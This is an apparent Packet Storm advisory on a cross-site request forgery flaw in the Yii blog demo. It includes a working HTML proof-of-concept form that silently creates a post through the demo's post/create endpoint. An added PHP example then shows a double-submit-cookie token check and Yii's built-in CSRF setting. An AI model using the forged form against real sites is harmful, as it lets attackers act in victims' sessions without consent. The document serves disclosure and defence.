Yii Framework Blog Cross Site Request Forgery

2014-03-03T00:00:00
ID PACKETSTORM:125511
Type packetstorm
Reporter Christy Philip Mathew
Modified 2014-03-03T00:00:00

Description

`# Exploit Title: Yii Framework Blog Application CSRF Vulnerability  
# Date: 3 Mar 2014  
# Author: Christy Philip Mathew  
# Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/  
# Category: web  
# Tested on: Windows 8  
  
An attacker will be able to create a post.  
  
<html>  
  
<body>  
<form action="http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST">  
<input type="hidden" name="Post[title]" value="test" />  
<input type="hidden" name="Post[content]" value="test" />  
<input type="hidden" name="Post[tags]" value="test" />  
<input type="hidden" name="Post[status]" value="2" />  
<input type="hidden" name="yt0" value="Create" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
`
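
Why the server accepts the request above, and the check that rejects it, as an added example (not part of the original advisory and not Yii's own code): a stand-alone double-submit-cookie validation run against the advisory's POST fields. The function names, the sample requests and the token value are constructed for illustration; assuming the demo is built on Yii 1.1, the framework's built-in equivalent is enabled with `'request' => array('enableCsrfValidation' => true)` in the application's components config.

```php
<?php
// Added example: double-submit-cookie CSRF check (illustrative, not Yii's code).
// TOKEN_NAME is an assumption; it mirrors Yii 1.1's default csrfTokenName.
const TOKEN_NAME = 'YII_CSRF_TOKEN';

/** Issue a random token; the app sets it as a cookie and embeds it in every form. */
function issueCsrfToken(): string
{
    return bin2hex(random_bytes(32));
}

/**
 * Accept a state-changing request only when the token in the request body
 * matches the token in the cookie. A cross-site page can make the browser
 * send the cookie, but it cannot read the cookie's value to copy into the body.
 */
function csrfTokenIsValid(string $method, array $post, array $cookies): bool
{
    if (!in_array(strtoupper($method), ['POST', 'PUT', 'PATCH', 'DELETE'], true)) {
        return true; // safe methods must not change state, so no token is required
    }
    $fromCookie = $cookies[TOKEN_NAME] ?? null;
    $fromBody   = $post[TOKEN_NAME] ?? null;
    if (!is_string($fromCookie) || !is_string($fromBody) || $fromCookie === '') {
        return false; // missing or malformed token: reject
    }
    return hash_equals($fromCookie, $fromBody); // constant-time comparison
}

// --- Constructed sample data ---
$token   = issueCsrfToken();
$cookies = [TOKEN_NAME => $token]; // the victim's browser may attach this cross-site

// The fields of the form in the advisory: no token field is present.
$forged = [
    'Post' => ['title' => 'test', 'content' => 'test', 'tags' => 'test', 'status' => '2'],
    'yt0'  => 'Create',
];
// The same post submitted from the application's own form, which embeds the token.
$legit = $forged + [TOKEN_NAME => $token];

var_dump(csrfTokenIsValid('POST', $forged, $cookies)); // forged cross-site request
var_dump(csrfTokenIsValid('POST', $legit, $cookies));  // request from the real form
```

With validation enabled in Yii 1.1, forms rendered through `CHtml::beginForm()` or `CActiveForm` carry the hidden token field automatically; hand-written `<form>` tags need it added explicitly.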